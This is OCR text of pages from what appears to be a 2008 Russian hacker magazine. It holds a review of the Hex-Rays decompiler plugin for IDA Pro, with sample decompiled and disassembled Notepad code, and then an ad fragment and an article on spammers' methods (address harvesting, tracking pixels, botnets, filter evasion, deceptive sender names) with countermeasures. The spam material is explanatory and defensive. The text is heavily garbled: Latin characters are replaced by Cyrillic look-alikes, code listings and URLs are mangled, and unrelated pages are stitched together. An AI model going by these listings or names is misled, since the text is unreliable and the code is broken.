ЬМосІиІе, X, У, пѴѴісЙб, пНеідбІ, бСигзог, бМепи, 601д. Согла- 
сись, это намного лучше, чем бѵѵогсЫ 008030, бѵѵогсМ 008269, 
бѵѵогсЫ 006933, что характерно для подавляющего большин- 
ства остальных декомпиляторов. 

Даже если часть переменных распознана, то это уже упрощает 
анализ программы и реконструкцию оставшихся переменных. 

0 КОНСТАНТА ИЛИ СМЕЩЕНИЯ 

В силу архитектурных особенностей х86-процессоров 
константы и смещения (они же втерминах языков высокого 
уровня указатели] синтаксически абсолютно неразличимы, 
и декомпилятору (равно как и дизассемблеру] приходится 
задействовать мощные эвристические алгоритмы, чтобы не 
попасть впросак. 

А какая между этими двумя сущностями разница? Очень боль- 
шая! Вот, например, в регистр Е АХ загружается число 1069966. 
Если это указатель на ячейку памяти или массив данных, то 
дизассемблер должен воткнуть по этому адресу метку (ІаЬеІ) 
и написать МОѴ ЕАХ, -О^зе^ Іа Ь_1 06996 (естественно, имя 
метки дано условно, и совпадение с ее численным значением 
абсолютно случайно — при повторной компиляции она может 
оказаться расположенной по совершенно другому адресу). А 
вотесли 1069966 — это константа, выражающая, например, 
среднюю плотность тушканчиков на один квадратный метр 
лесополосы или количество полигонов на морде монстра, то 
ставить о^зеі: ни в коем случае нельзя, поскольку это введет 
нас в заблуждение при анализе, а еще, какуже говорилось, при 
повторной компиляции смещение можетуплыть, превращая 




число 1069966 черт знает во что. Программа либо будет 
работать неправильно, либо сразу рухнет (особенно, если 
путаница между константами и смещениями происходит не 
единожды, а совершается на протяжении всего листинга]. 

Так какже все-таки определить, кто есть кто? На первый 
взгляд, все достаточно просто. Если данная сущность 
используется какуказатель (то есть через нее происходит 
обращение к памяти по заданному адресу: тоѵеах, 1 069966/ 
тоѵеЬх,[еах]),тути дизассемблеру ясно, что это смещение. 

Но стоитлишь немного усложнить пример, скажем, передать 
1 069966 какой-нибудь функции или начать производить с ней 
сложные манипуляции, то дизассемблеру потребуется выса- 
диться на полную реконструкцию всей цепочки преобразова- 
ний. Но даже тогда его решение может оказаться неверным, 
поскольку в языке Си индексы (то есть константы) и указатели 
(то есть смещения) полностью взаимозаменяемы и конструк- 
ция Ьиі : [69] нетолько равносильна 69[Ьиб] , но и транслируется 
в идентичный машинный код, при реконструкции которого 
возникаеточевидная проблема. 

У нас есть два числа — А и В, сумма которых представляет 
указатель (то есть существует возможность определить, что это 
указатель, да и то если попыхтеть], но вот что из них индекс? 
Увы. Формальная математика не дает ответа на этот вопрос, 
и дизассемблеру приходится полагаться лишь на свою инту- 
ицию да эвристику. Указатели в ѵѵі п32, как правило, велики, 
поскольку минимальный базовый адрес загрузки файла равен 
1 000006. Индексы же, как правило (опять! как правило!), малы 
и много меньше указателей, однако еслиу нас имеется массив, 
расположенный по адресу 2000006 и состоящий из 3 145 728 
(3000006) элементов (а почему бы, собственно, и нет?!), то тут 
индексы старших элементов становятся больше базового 
указателя на массив, что вводит дизассемблер в заблуждение. 
Полный перечень эвристических методик, используемых ЮА 
для распознавания смещений, можно найти в книге «Образ 
мышления — ЮА» (электронная копия которой находится на 
сервере бирУ/пегиті.ога.ги/ісІа.іиЦ.гір ). Нам же достаточно 
сказать, что ЮА действительно преуспела в этом направлении 
и ошибается крайне редко. И тем не менее все-таки ошиба- 
ется, а с ростом размеров дизассемблируемой программы 
количество ошибок резко нарастает. 




> ѵісіео 

Хочешь пример 
полностью деком- 
пилированного 
приложения? На 
нашем диске будет 
видеоролик, демон- 
стрирующий воз- 
можности НехРауз. 




> СІѴСІ 

Демонстрационную 
версию ЮАты най- 
дешь на нашем дис- 
ке. Ксожалению, мы 
не можем выложить 
НехРауз по правовым 
соображениям. 




А вот как выглядит сама ЮА Рго 
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НехРауз — это отдельный продукт и втоже время... плагин для ЮА Рго 
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В качестве подопытного кролика возьмем 
обычный блокнот 



г КОД ИЛИ ДАННЫЕ 

Воттак проблема! Наверное, даже самый тупой дизассемблер разберется, 
что ему подсунули: код или данные, тем более что в РЕ-файлах (основной 
форматисполняемых файлов под ѴѴіпсІоѵѵз) они разнесены по разным 
секциям. Ну, это втеории они разнесены, а на практике компиляторы очень 
любят пихать данные в секцию кода (особенно этим славиться продукция 
фирмы Вогіапб). 

С другой стороны, практически все компиляторы (особенно на Си++) 
сплошь и рядом используют вызовы функций типа САІ_І_ ЕВХ. Чтобы понять, 
куда ведеттакой вызов, необходимо установить значение регистра ЕВХ, что 
требует наличия более или менее полного эмулятора процессора, отслежи- 
вающего всю историю содержимого ЕВХ с момента его инициализации и до 
непосредственного вызова. 

Но непосредственные вызовы — ерунда. Вот косвенные — это да! Реконс- 
трукция САІ_І_сІ\л/огсІ р1х05:[ЕВХ] требует не только эмуляции процессора 
(то есть набора машинных команд), но и эмуляции памяти! Естественно, 
это на порядокусложняетдизассемблерный движок, зато нераспознанные 
массивы данных мгновенно превращаются в функции, и, что самое главное, 
дизассемблер показывает, кто именно и откуда их вызывает! 

Наличие эмулятора процессора и памяти позволяеттакже отслеживать 
положение регистра Е5Р, используемого для адресации локальных пе- 
ременных и аргументов, передаваемых функциям. Если же эмулятора нет 
(а в ЮАон есть), дизассемблер способен распознавать лишь простейшие 
формы адресации/передачи аргументов. Механизм, ответственный за рас- 
познание и отслеживание аргументов, носит красивое название РІТ, но эта 
аббревиатура отнюдь не расшифровывается как«Пивоваренный [завод] 
Ивана Таранова», а происходит от Рагатеіег Иепббсабоп апсі Тгаскіпд 
— идентификация и отслеживание параметров, то есть аргументов. Тех, что 
бываюту функций. Аеще бывают функции без аргументов, но это уже другая 
история. 

г РЕКОНСТРУКЦИЯ ПОТОКА УПРАВЛЕНИЯ 

Языки высокого уровня оперируюттакими конструкциями, как циклы, 
операторы выбора, ветвления и т.д., что делает программу простой и 
наглядной. Собственно говоря, именно отсюда и пошло структурное 
программирование. А ведь когда-то, давным-давно, в Бейсике (и других 
языкахтого времени), кроме примитивного СОТО, ничего не было и про- 
грамма, насчитывающая больше сотни строк, превращалась в сплошные 
«спагетти», лишенные всякой логики, внутренней организации и следов 
цивилизации. 

На низком же, машинном, уровне ситуация осталась той же, что и лет 
50 тому назад. И хотя х86- процессоры формально поддерживают инс- 
трукцию цикла І_ООР, компиляторы ее не используют, довольствуясь 
одними лишьусловными и безусловными переходами, а потому перво- 
очередная задача реверсера — реконструировать циклы, ветвления и 
другие высокоуровневые сооружения. Подробнее о том, как это делает- 
ся руками, читай в «Фундаментальных основах хакерства» (бесплатная 
электронная копия лежит на Ьир://пе 2 иті.ога.ги/рЬск 2 .іи[[. 2 Ір ). 
Начиная с пятой версии в ЮА Рго появился механизм графов, позволяю- 



щий автоматически реконструировать циклы, ветвления и прочие «кирпичи» 
языков высокого уровня. Впрочем, польза от графов была небольшой, и в 
реальности они только замедляли анализ, поскольку подобрать адекват- 
ный механизм визуализации и навигации Ильфакутаки неудалось... Но 
ведь не пропадать же труду?! 

г У ИСТОКОВ НЕХКАѴ5 

К пятой версии ЮА Рго имела в своем арсенале все необходимое для 
автоматической де компиляции, причем не просто декомпиляции, а 
очень качественной декомпиляции, декомпиляции принципиально 
нового уровня, до которого не дотягивает ни один другой существующий 
декомпилятор. 

Воттаки родилась идея дописать к ЮА еще небольшую (на самом деле 
очень большую) порцию кода, переводящую китайскую ассемблерную 
грамоту в доступный и понятный листинг на языке Си. Закипела напря- 
женная работа, по ходу которой выявлялись все новые и новые подводные 
камни, обход которыхтребовал времени, усилий и мозговой активности. А 
всякая (или практически всякая) работа упирается в деньги, тем более что у 
Ильфака фирма! 

Включать декомпилятор в дистрибутив ЮА Рго Ильфак не стал. Тому 
было несколько причин. Первая и главная — основной массетекущих 
пользователей ЮА декомпилятор не сильно нужен, если они им и будут 
пользоваться, то лишь из чистого любопытства, запустят пару раз, плю- 
нут и вернутся к привычно му стилю жизни — анализу дизассемблерно- 
го листинга. Второе — зарабатывать на жизнь (Ильфаку) и содержать 
фирму как-то же надо?! 

Все это привело ктому, что декомпилятор, получивший название 
(НехРауз), был выпущен отдельным продуктом, но — внимание на экран 
— требующим обязательного присутствия ЮА, поскольку НехПау5 — все- 
го лишь плагин. Таким образом, реверсеру, желающему упростить свою 
жизнь за счетавтоматической декомпиляции, необходимо прибрести как 
саму ЮА, так и НехРауз. Причем приобретать этот комплект будет совсем 
другая пользовательская аудитория, совсем нета, что приобретала ЮА и 
почитала ее как самый лучший интерактивный дизассемблер. Интерак- 
тивный — значиттесно взаимодействующий с пользователем (в смысле с 
хакером). В противовес ей, пакетные дизассемблеры стремятся к макси- 
мальной автоматизации реверсинга, лишая пользователя возможности 
вмешиваться в процесс и отдавать указания. НехРауз, в отличие от ЮА 
Рго, интерактивностью не обладает — она у него атрофирована еще в 
зародыше. Нет даже опций настройки! Атам, где нет интерактивности, 
нет и хакеров. И тут мы плавно переходим к ответу на вопрос, кому нужен 
НехРауз. 

В БОЕВОЕ КРЕЩЕНИЕ 

Итак, НехРауз у нас на руках. Устанавливаем его туда же, где располагаются 
все остальные плагины для ЮА Рго, и приступаем ктестированию. В ка- 
честве объекта тестирования используется стандартный блокнот (в данном 
случае из комплекта поставки ѴѴ2К5Р0), на котором обкатываются все виру- 
сы, все упаковщики исполняемыхфайлов (вместе с распаковщиками), все 
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Огромное количество ошибок компиляции декомпилированного листинга 



протекторы... словом, декомпилятор не станетисключением. Ачто? Блокнот 
— достаточно простая программа, обуславливающая тот минимум функци- 
онала, ниже которого декомпилятор из мощного программного комплекса 
превращается в дорогостоящую, но абсолютно бесполезную игрушку. 
Загрузив поіерасі.ехе в ЮА Рго и ответив на ряд несложных вопросов 
мастера автоанализа, даем дизассемблеру некоторое время поработать и, 
когда он перейдет в режим ожидания, заходим в меню «Рііе -> Ргобисе Рііе 

Сгеаіе С біе» или нажимаем горячие клавиши <СМ-Р5>. 

Сначала на экране появляется логотип НехРауз с предложением прове- 
риться на обновления и после нажатия на ОК НехРауз думает некоторое 
время, а когда он закончитзаниматься магической деятельностью, на диске 
образуется файл поіераб.с. 

Ура! Свершилось! Пробуем откомпилировать его компилятором М5 ѴС 6.0, 
предварительно скопировав в текущий каталог файл сІе^з.Ь из каталога 
НехРауз и заменив в строке #іпс1ибе <бе^з.Ь> угловые скобки двойными 
кавычками, иначе компилятор будет искать сІе^з.Ь в системном каталоге с 
включаемыми файлами, где, естественно, его не обнаружит. Но это мелочи... 
А вотуже проблема посерьезнее. Компилятор, выдав более сотни ошибок, 
просто прерывает компиляцию, поскольку продолжать ее дальше нет 
никакого смысла. 

Может, мы не тот компилятор выбрали для тестирования? Вообще-то, по 
идее, декомпилятор должен выдавать листинг на АЫЗІ С, поддерживаемый 
любым АЫЗІ-совместимым С-компилятором, но... все мы хорошо знаем 
любовь Ильфака кпродукции фирмы Вогіапб. На нем написана сама ЮА, 
на немже вышло первое 50К... Хорошо, берем последнюю версию Вогіапб 
С++ (благо она бесплатна) и что же?! Вновь простыня ошибок и ругательств, 
приводящих к преждевременному прерыванию компиляции. Оказывается, 
чтобы откомпилировать декомпилированный файл, над ним еще предстоит 
основательно поработать. Воттебе и раз... 

А воттебе и два! Декомпилятор выдал чистый *.с-файл, проигнорировавтот 
факт, что поіераб.ехе содержит еще и секцию ресурсов, но даже если при 
загрузке блокнота в ЮА форсировать обработку ресурсов, мы все равно ни- 
чего не получим. Ну не умеет НехРауз с ними работать и все-тут! Возможно, 
когда-нибудь он этому и научиться, но сейчас — нет. 

Другими словами, НехРауз не позволяет компилировать декомпили- 
рованные программы без дополнительной ручной работы и реально 
пригоден лишь для анализа. Возникает резонный вопрос: и насколько 
же он упрощает а нал из? Чтобы не быть голословным, приведу два 
фрагмента кода: 

ФРАГМЕНТ БЛОКНОТА, ДЕКОМПИЛИРОВАННОГО НЕХКАѴ5 

і б ( КедОрепКеу ЕхА ( 

НКЕУ_СЬА55ЕЗ_КООТ , 

"СЬЗІВ\\ {АВВ880А6-В8ЕЕ-11СЕ-9377-00АА003В7А11 } " 

" \\ІпргосЗегѵег32 " , 

0, 

0х20019и, 

&1іКеу ) ) 

{ 

гезиіб = 0 ; 

} 

еізе 

{ 

сЪВаба = 260; 

іб ( ! Кед<2иегуѴа1иеЕхА (ЬКеу , ѴаІиеЫаше, 0, 



0, ІрВаба, &сЪВаба) ) ѵі = 1; 

КедСІозеКеу (ЬКеу ) ; 
гезиіб = ѵі; 

} 

гебигп гезиіб; 

Просто? Красиво? Понятно? Элегантно? Еще как! А вот как выглядел тотже 
самый код в чистом дизассемблере: 

ТОТЖЕ КОД В ЧИСТОМ ДИЗАССЕМБЛЕРЕ 



.ЬехЬ:0100318Р 


ризЬ 


еЬр 


-Сех!: 01003190 


шоѵ 


еЪр, езр 


-Сех!: 01003192 


ризЬ 


есх 


•Сехѣ: 01003193 


ризЬ 


есх 


.Ьехі: 01003194 


Іеа 


еах, [еЬр+ЬКеу] 


■Сех!: 01003197 


ризЬ 


езі 


.ЪехЬ: 01003198 


хог 


езі, езі 


. ЪехЬ : 0100319А 


ризЬ 


еах ; рЬкКезиІб 


. Іехі : 0100319В 


ризЪ 


200191т ; затВезігесІ 


. Іехі : 010031А0 


ризЪ 


езі ; иІОрбіопз 


. Іехі : 010031А1 


ризЪ 


оббзеб ЗиЪКеу ; ІрЗиЬКеу 


. ІехЬ : 010031А6 


ризЪ 


8000000 ОЪ. ; ЪКеу 


. Іехі : 010031АВ 


саіі 


(із : КедОрепКеуЕхА 


. Іехі : 010031В1 


безб 


еах, еах 


.Іехі : 010031ВЗ 


б П2 


зЬогб 1ос_10031Е7 


. Іехі : 010031В5 


Іеа 


еах, [еЬр+сЬВаба] 


. Іехі : 010031В8 


шоѵ 


[еЬр+сЬВаба] , 104Ь 


. Іехі: : 010031ВР 


ризЪ 


еах ; ІрсЪВаба 


■ЬехЬ:010031С0 


ризЬ 


[еЪр+ІрВаба] ; ІрВаба 


■ ІехЬіОЮОЗІСЗ 


ризЪ 


езі ; ІрТуре 


. Іехі: : 010031С4 


ризЬ 


езі ; ІрКезегѵесі 


. ІехЬ : 010031С5 


ризЪ 


оббзеб ѴаІиеЫаше 


; 1 рѴа 1 иеЯате 






. Іехі : 010031СА 


ризЪ 


[еЬр+ЬКеу] ; ЬКеу 


. Іехі : 010031СО 


саіі 


сіз : КедОиегуѴаІиеЕхА 


.Іехі : 010031БЗ 


безб 


еах, еах 


. Іехі : 010031Б5 


б П2 


зЬогб 1ос_10031ВА 


. ІехЬ : 010031Б7 


ризЪ 


1 


. іехЬ : 010031Б9 


рор 


езі 


. іехЬ : 010031БА 1ос_ 


Д0031ВА: 






; СОВЕХКЕЕ: зиЬ_100318Е+46 


.іехЬіОІООЗІБА 


ризЬ 


[еЬр+ЬКеу] ; ЬКеу 


. Іехі : 010031БП 


саіі 


сіз : КедСІозеКеу 


.Іехі : 010031ЕЗ 


шоѵ 


еах, езі 


. Іехі : 010031Е5 


:шр 


зЬогб 1ос_10031Е9 


. Іехі : 010031Е7 1ос_ 


Д0031Е7 : 






; СОВЕХКЕЕ: зиЬ_100318Е+24 


. Іехі : 010031Е7 


хог 


еах, еах 



. бехб : 010031Е9 
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Система визуали- 
зация кода в виде 
графов в ЮА Рго 
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. ЦехС : 010031Е9 1ос_10031Е9: 

; СОБЕХКЕР: зиЪ_100318Е+56 
. ЦехС : 010031Е9 рор езі 

. ЦехС : 010031ЕА Іеаѵе 

. Цехе : 010031ЕВ геЦп 4 

Согласись, что сравнение отнюдь не в пользу дизассемблера, но не спеши 
радоваться. Рассмотрим еще один пример: 

ЕЩЕ ОДИН ПРИМЕР РАБОТЫ ДЕКОМПИЛЯТОРА 

іі ( (ипзідпесі іп!:1б)а2 == 1 ) 

{ 

йж>гс 1 _ 1008 ВСС = (Зтл 7 ОГ( 3_1008028 ; 

іб ( ! (ЗтлгогсІ_1008014 &&. 

зиЪ_10059АЗ (<іж>гсІ_10087В0 , &8Сгіпд2 , 0) ) 

{ 

геЬигп 1; 

} 

} 

Что делает этот код? Совершенно непонятно. То есть нето чтобы совсем 
непонятно, но смысл как-то ускользает. Туттребуется проанализиро- 
вать, что это за переменные такие, кто еще (помимо этой функции) их 
модифицирует и зачем? В дизассемблере листинг выглядит схожим 
образом, но мощная система навигации по коду вкупе с перекрестными 



ссылками и подсветкой одноименных переменных/функций сокращает 
время анализа на несколько порядков, причем ни в одном текстовом 
редакторе, ни в одной среде программирования подобной системы 
навигации по коду нет! 

А ЭТО ВИД В ДИЗАССЕМБЛЕРЕ 

. ЦехС : 010023 Об 1ос_1002306: 



; СОБЕХКЕЕ: зиЬ_1002239+С4 



ІехС: 01002306 


шоѵ 


еах, сЫогс!_1008028 


ІехО : 0100230В 


ризЪ 


еЬх 


ІехО : 0100230С 


ризЪ 


есіі 


ЬехО : 01002300 


шоѵ 


(Зѵ7ОгсЗ_1008ВСС , еах 


ІехО : 01002312 


ризЪ 


ЙѴ70Г (3_1 0 0 8 7 Б 0 


ЬехО: 01002318 


саіі 


зиЬ_10059АЗ 


ІехО : 010023Ю 


безб 


еах, еах 


ЬехО : 0100231Р 


32 


зЪоП: 1ос_1002328 



В НАШ ВЕРДИКТ 

НехВауз — это, безусловно, большой шаг вперед и неплохое подспорье 
для начинающих, но... он не стоит тех денег, которые за него просят, ктому 
же (это касается начинающих), однажды потратив время на изучение 
ассемблера, мы обретаем возможность реверсировать что угодно и в чем 
угодно (на худой конецс помощью утилиты ОІІМРВІМ.ЕХЕ, входящей в 
состав 50К), а обольщенные возможностями автоматической декомпиля- 
ции, мы становимся заложниками НеуРауз со всеми вытекающими отсюда 
последствиями. НЕ 



- і шмлБідіін ііУі і!> 4 | іпі гтині_рн 



гь № ігы Мі Ѵш-> СщЬиюж Сфяп нгЬ 



- 1 ^ 
О (К к» 

е 

В 

{ПК 

□34* 



зг 






в ВІ И % 


і 


в т 







03 1 Р з 

41 * 



[. , .-іМДО,,' 1 * 1 >Ѵ:І I 

Г Г .-.ЖІГТ^'.Т'ЧІГІІГ?.^ ^ 

] . Г « И1-Л4ВІ г. ■ 

4, 

/ [■! 



] 

он* йрлпэт і*. 

й4И»[ѵм. . 

ОтйіНіМ. Ік. 






Й4-Н 



? &ир (**ы !я ЦКЧк.. 






гл 7* 



КОМПИЛЯЦИЯ 

ачинается! 



щия 



► 036 



ХАКЕР 02 /110/ 08 












ЭТИ ПРИДУРКИ 



О 1 твоя 

НОВАЯ СЕМЬЯ 



СЕРИАЛ 



В 21:00 НА МГУ! 

СМОТРИ С 11 ФЕВРАЛЯ 






шп-шхт 




КОЗЫРНЫХТРЮКОВ 



СПАМЕРОВ \ 

УЛОВКИ СПАМЕРОВ И МЕТОДЫ БОРЬБЫ С НИМИ 



Не по чтовый ящик, а сплошной мусор. Трэш! Как им это, черт подери, у дается?! Мало 






того, что спамеры вредоносны, так они еще дьявольски хитры и нереально изворотливы. 



них все тузы да козыри, и, чтобы нас не развели как сам знаешь кого, приходится 



^щэинимать кучу мер предосторожности и держать ухо востро. Как говориться, кто 
" е дупрежде н — тот вооружен! Рассмотрим основные трюки спамеров и покажем, как 
м противостоя ть, тем более что эти приятели постоянно придумывают что-то новое! 






трюк первый: идгеявкиаим 

КАК СПАМЕРЫ ДОБЫВАЮТ АДРЕСА! 



База адресов — основноетопливо спамера, без которого он никуда 
не уедет. А как создаются такие базы? Самое простое и чрезвычайно 
эффективное — атака по словарю. Выбирается какой-нибудь популярный 
почтовый сервер (типа таіі.ги] и последовательно перебираются все 
имена и клички в стиле Аіехісітаіі.ги, 5ѵеІа(с)таі1.ги, БирегМапЙтаіІ.ги, 
в том числе и инициалы, например ккйтаіі.ги. Таким образом, облада- 
тели коротких (или словарных] адресов рискуют попасть в спамерские 
базы даже в том случае, если вообще нигде не будут публиковать свои 
контакты. 

Кстати, о публикации. Оставляя свою мыльницу на форумах, в госте- 
вых книгах и прочих отхожих местахтипа заборов, многие прибегают 
к обфускации или, говоря простым языком, маскировке, скрывая их от 
«пауков», которые какхарвестры бродят по Сети, отыскивая все, что 
содержит в себе символ «0» (он же «собака»). Ну, это раньше они тупо 
искали «0»... Теперьже стратегия добычи адресов изменилась. Харвестр, 
просматривая одну ѵѵеЬ-страничку за другой, ищет имена известных 
почтовых серверов, а потом берет все, что расположено слева от них. То 
есть«ІпѵІ5ІЫе-.]ое гав-гав таіі.ги» будет съедено за милую душу. И даже 
«"ІпѵІ5ІЫе^ое_апІІ5тар_аІ:_гпаі1.ги /* гетоѵе м _апб5тар_" */» не спасет, 



поскольку подобные шаблонные примы уже давно распознаются автома- 
тами. Единственное, что пока более или менее стабильно работает, — это 
имя после адреса сервера: «Пишите мне на таіі.ги на ІпѵІ5ІЫе-_)ое». 
Никакой харвестр его не добудет. 

Еще круче — написать свое мыло в графическом редакторе, желатель- 
но на пятнистом неоднородном фоне, затрудняющем механическое 
распознавание, и вставить его как рисунок. Сборщики адресов, умеющие 
распознавать картинки, мне пока не встречались, но в общем случае это 
всего лишь делотехники. С другой стороны, далеко не всякий форум и 
доска объявлений позволяют вставлять картинки, плюс ко всему, пока 
будешь переписывать тексте картинки, ошибешься сто раз подряд и 
вообще писать всякое желание пропадет. 

Еще один источникугрозы — вирусы, трояны и черви, сканирующие ад- 
ресные книги и почтовые базы входящих и отправленных писем, добывая 
из них адреса вместе с именами получателей. Поэтому если ты следишь 
за своей безопасностью, а твой друг— нет, то, во-первых, он тебе не 
друг, а во-вторых, писать ему лучше с отдельного ящика, чтобы потом не 
выгребать мегабайты спама со своей основной мыльницы (что особенно 
актуально для служебных ящиков, не снабженных мощными антиспа- 
мерскими фильтрами). Впрочем, защита корпоративных ящиков — тема 
совсем другого разговора, и за этим должен следить админ. 
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Важную роль в фильтрации спама на Ѳтаіі и Яндекс. Почта играет пользова-І 
тель, нажимая кнопки «Спам» и «Не спам» 



ТРЮКВТОРОИ: 

ИЗ РЕАНИМАЦИИ В МОРГ 



Собрать базу почтовых адресов — это только половина дела. Еще как ми- 
нимум предстоит отделить действующие мыльницы от давно заброшен- 
ных. Естественно, если обозначенный адрес не существует, то почтовый 
сервер вернет ругательный ответ и с этим будет все ясно — просто вычер- 
чиваем адрес из списков живых. Если же письмо ушло и не вернулось, 
то вовсе не факт, что оно действительно доставлено реально сущест- 
вующему получателю. Возможно, он давно забросил этот ящик и уже год 
его не посещает. Когда ящик переполнится, сервер начнет возвращать 
письма, но, учитывая, что многие современные службы предоставляют 
ящики неограниченного (ну или практически неограниченного) объема, 
переполнение случится нескоро. 

Антиспамерские фильтры сплошь и рядом режут почту без каких бы то 
ни было уведомлений, от чего страдают не только спамеры, но и честные 
пользователи, и прибегать ктакой политике борцам со спамом категори- 
чески не рекомендуется. Отправитель всегда должен иметь возможность 
узнать, что его письмо не дошло до получателя (особенно если речь идет 
о корпоративной переписке). Но, увы, политикой поведения фильтров 
заведуют злобные администраторы, у которых свое видение проблемы. 
Мы не понимаем их, они не понимают нас... Но оставим в покое админист- 
раторов и вернемся к нашим баранам, то есть спамерам. 

Даже если спам достиг ящика пользователя, получатель могудалить его 
не открывая, просто прочитав название темы и отправив непрошеную 
корреспонденцию в корзину. Особенно это удобно делать через ѵѵеЬ-ин- 
терфейс. Локальные же почтовые клиенты обычно автоматически загру- 
жают письмо в окно предварительного просмотра, стоиттолько поднести 
к нему курсор, а если не подносить, то как, черт возьми, его удалить?! 
Спамерам нужно предельно точно знать, какой процент писем был 



реально доставлен и прочитан (поскольку если этот показатель вдруг 
упадет, то придется разрабатывать новые технологии рассылки). 
Специально для этой цели и рассылаются письма в НТМІ_-формате с так 
называемыми «жучками» — обычной ссылкой на рисунок, физически 
располагающийся на ѵѵеЬ-сервере, подконтрольном спамеру. Почто- 
вые клиенты автоматически загружают та кие картинки при просмотре 
письма, что не только подтверждает факт его получения, но и позволяет 
определить тип установленных фильтров и систем защиты. 

В частности, антивирусы загружают лишь заголовки графических файлов 
(поскольку некоторые из них содержат некорректные поля, приводящие к 
переполнению локальных буферов и, как следствие, к атакам на систему). 
Антиспамерские фильтры также загружают картинки (особенно когда все 
письмо целиком из одной картинки и состоит), но заголовок НТТР-за- 
проса фильтра сильно отличается от НТТР-заголовка почтового клиента. 
Самое главное — если картинок больше одной и сервер умышленно 
замедляет их отдачу, то спамер без труда определит, сколько прошло 
времени перед тем, как получатель письма отправил его в корзину. Вот 
тебе и приватность! Всетайны — как на ладони! 

Как избавиться оттакой напасти? Единственный способ — отключить ав- 
томатическую загрузку картинок (в разных почтовых клиентах это делает- 
ся по-разному, и тут надо курить руководство пользователя), а еще лучше 
вообще отключить НТМ1_, чего, кстати, Оиііоок Ехргезв ну никак не позво- 
ляет, зато Тбе Ваі справляется с этим без проблем! Конечно, в текстовом 
виде письма смотрятся серо, однообразно и скучно, затоу спамеров не 
остается никакой возможности узнать, было письмо прочитано или нет. 
Кстати говоря, на смену «картиночному» спаму, который наконец-то по- 
шел на спад, приходит новый тип массовых рекламных рассылок. Теперь 
тексты с призывами увеличить детородный орган или купить чудодейст- 
венный лекарственный препарат прячутся в РйР-файлах. 



ТРЮКТРЕТИИ: 

ОБХОДИМ СЕРВЕРНЫЕ ФИЛЬТРЫ 



Два основных критерия, по которым фильтры, установленные на почто- 
вых серверах, определяют, что относится к спаму, а что нет, — это ІР-ад- 
рес отправителя и содержимое письма. Существующие распределенные 
антиспамерские базы оперативно заносят проштрафившиеся ІР-адреса 
в черные списки, и рассылка дохнет буквально через несколько часов 
после начала, конечно, при том условии, что она осуществляется с одного 
или нескольких фиксированных ІР-адресов. 

Обходить черные списки не научился только ленивый. Спамеры рассыла- 
ютчервей, расползающихся по всей Сети и проникающих в сотнитысяч 
компьютеров, захватывая над ними полный контроль. Пораженные узлы 
называются дронами, а их совокупность образует ботнет, позволяющий 
спамеру вести рассылку сразу во всех направлениях. Даже если каждый 
дрон разошлет всего десяток писем, прежде чем попадет в черный 



список, база из ста тысяч дронов доставит корреспонденцию миллиону 
адресатов! 

И вот чтобы этого не происходило, на крупных почтовых серверах уста- 
новлены продвинутые фильтры, анализирующие содержимое всех писем 
и блокирующие спам независимо оттого, с какого адреса он пришел. 

За минувшие годы спамеры испробовали множество методик борьбы с 
контентными фильтрами, слегка модифицируя содержимое каждого от- 
правляемого письма (или серии писем) так, чтобы сигнатурный поиск не 
сработал. И воттут-то разработчикам фильтров пригодились антивирус- 
ные движки, детектирующие полиморфные вирусы (то есть изменяющие 
своетело). Дольше всех продержался графический спам, поскольку в 
графику очень легко вносить незначительные (сточки зрения человека) 
трансформации, совершенно преображающие байтовый поток (с машин- 
ной точки зрения). Но прогресс не стоит на месте, и доля графического 
спама после его внезапного всплеска сейчас стала уменьшаться. ^ 
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Междутем спамеры все это время не сидели сложа руки и ковали 
новое орудие возмездия, которое в ближайшее время будет запущено 
в промышленную эксплуатацию. Идея заключается все в тех же кар- 
тинках, внедренных в НТМІ_ и расположенных на внешних серверах. 
Поскольку заголовок НТТР-за проса позволяет с достаточной точнос- 
тью идентифицировать клиентское приложение, антиспамерскому 
фильтру подсовывается одна картинка (сгенерированная абсолютно 



произвольным образом), а честный адресат получает рекламную 
рассылку. 

Как можно этому противостоять? С клиентской стороны — никак (единс- 
твенный выход — запретить загрузку картинок), но вот разработкам 
фильтров достаточно прикинуться настоящим почтовым клиентом, и 
тогда спамер будет вынужден показать им рекламную картинку в том 
виде, в каком она есть, после чего защемить его уже не проблема. 



ТРЮК ЧЕТВЕРТЫЙ 
СПАМ ИЛИ НЕ СПАМ?! 



Несмотря на ожесточенную борьбу со спамом, какая-то часть непроше- 
ной корреспонденции все-таки доходит до народа, и тут самое главное 
— составить послание так, чтобы жертва прочитала его прежде, чем 
нажмет на <ЭеІ>. А для этого приходится мухлевать не по-детски. 

Начнем с поля отправителя письма. «Слепые» поля — верный признак 
спама, и большинство почтовых клиентов отправляеттакие письма в 
-Іипк-іюісіег или помечает их красным цветом, мол, внимание! возможно, 
это спам! А потому какое-то имя вставить надо. Ну, скажем, Аіех, Реіег, 
Оіда... Фамилию лучше не вставлять — фамилии у всех разные, а незна- 
комая фамилия сразу обостряет внимание получателя, заставляя его 
машинально тянуться к клавише <ЭеІ>. Впрочем, голое имя без фамилии 



в нормальной жизни явление не самое часто. Что делать?! 

А вот что! Использовать шаблонные имена типа «Интернет-магазин...», 
«Служба поддержки...». Учитывая, что далеко не все пользователи 
используют широкие колонки для имени отправителя, придумывать, что 
это за магазин такой и чего мы поддерживаем, совершенно необязатель- 
но! С определенной долей вероятности пользователь вообще не увидит 
продолжения названия из-за узкой колонки, а письмо от магазина (в 
котором он, возможно, заказывал товар) и ужтем более от службы под- 
держки он откроет. 

Статистика показывает, что, как бы ни изощрялся спамер, ему отпущены 
считанные секунды, в течение которых пользователь (если он не даун, 
конечно) легко и безошибочно распознает спам, отправляя его в корзину. 
Некоторые (особо «одаренные») спамеры пытаются подделывать стиль ► 



Так как же 
все-таки 
защи- 
титься 
от спама? 

О том, как беспощадно удалять спа- 
мерские письма, мы уже писали мно- 
го раз. К сожалению, универсально- 
го способа не существует. И поэтому 



ситуации, когда среди нормальных 
писем совершенно безнаказанно 
проскакивает спам или, наоборот, 
вполне безобидное письмо попадает 
в папку іипктаіі, вполне обычное 
явление. Надо сказать, что бороться 
со спамом личными инструментами 
защиты стало все сложнее, и какими 
бы хорошими ни были всевозмож- 
ные утилиты и программы (взять 
хотя бы популярнейший 8рашра1), 
100%-ного результата они не дают. 
Да и дать не могут ! 

Но тем не менее способ, который 
позволяет если и не полностью 
избавиться от навязчивой коррес- 



понденции, то по крайней мере 
свести ее количество к минимуму, 
все-таки есть. Речь идет о встро- 
енных спам-фильтрах, которые 
предоставляют почтовые сервисы, 
разработанные крупнейшими 
поисковыми система. Это Сшаіі 
Гѵ\пдаѵ.^таі1.сот~) и Яндекс. Почта 
